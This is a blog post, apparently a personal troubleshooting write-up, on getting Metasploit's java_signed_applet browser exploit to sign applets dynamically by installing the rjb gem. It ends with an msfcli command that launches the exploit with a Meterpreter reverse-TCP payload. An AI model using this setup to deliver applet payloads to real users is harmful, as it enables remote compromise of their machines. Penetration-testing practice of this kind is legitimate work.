Java_signed_applet with RJB

I just wasted a lot of time trying to get the java_signed_applet exploit module working in Metasploit. Not that it doesn’t work by default, but you will get the warning

[-] 
[-] The JDK failed to initialized: no such file to load -- rjb
[-] In order to dynamically sign the applet, you must install the Java Development Kit, the rjb gem, and set the JAVA_HOME environment variable.
[-] 
[-] Falling back to static signed applet.  This exploit will still work, but the CERTCN and APPLETNAME variables will be ignored.
[-] 

More importantly, your applet will not display the message you want it to, and when I tried it, the payloads I would want to run like java/meterpreter/reverse_tcp weren’t working either. So you need the rjb (Ruby Java Bridge) gem.

Unfortunately, the version of ruby that is included with the default installer does not contain the rjb gem that the java_signed_applet module needs. Even more unfortunately, files like header files that are necessary to install the gem are not present and many errors and much frustration will result from attempting to copy these files in and install the gem. The easiest way is to either use a new install of ruby, or just steal the gem from another install of ruby, which is what I will show here. The following instructions work on Ubuntu Linux. Adapt as needed for your OS.

First make sure you have the latest Metasploit version. Go to http://www.metasploit.com/framework/download/ and download and install the latest version for your OS. Make sure you get the installer that includes Java! Then run msfupdate to make sure you are set. If you get a newer version, replace framework-3.5.2 in all the following commands with whichever version of Metasploit you get.

Next make sure you can compile stuff and check out git repositories, and point the environment to the framework’s install of Java.

sudo apt-get install build-essential autoconf bison zlib1g-dev libssl-dev libreadline5-dev libxml2-dev libsqlite3-dev curl git
export JAVA_HOME=/opt/framework-3.5.2/java/

Next install rvm. Commands from http://rvm.beginrescueend.com/rvm/install/

bash < <( curl http://rvm.beginrescueend.com/releases/rvm-install-head )
source ~/.rvm/scripts/rvm

Use rvm to get another copy of ruby and install rjb

rvm install 1.9.2
rvm use 1.9.2
gem install rjb

Copy the compiled gem over to the metasploit folder. Check these version numbers to make sure they are correct

sudo cp -r ~/.rvm/gems/$RUBY_VERSION/gems/rjb*/ /opt/framework-3.5.2/ruby/lib/ruby/gems/1.9.1/gems/

#Now it should work. Test it out!

msfcli multi/browser/java_signed_applet TARGET=0 PAYLOAD=java/meterpreter/reverse_tcp LHOST=127.0.0.1 URIPATH=/ 'CERTCN=It Works Inc.' E

and don't delete the installed copy of ruby. Either one.

And definitely don't decide to install jruby instead because you think jruby won’t need a Java bridge or it will be easier to make work. Because it won’t. I tried that too.

Advertisements

, , , , , ,

  1. Leave a comment

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: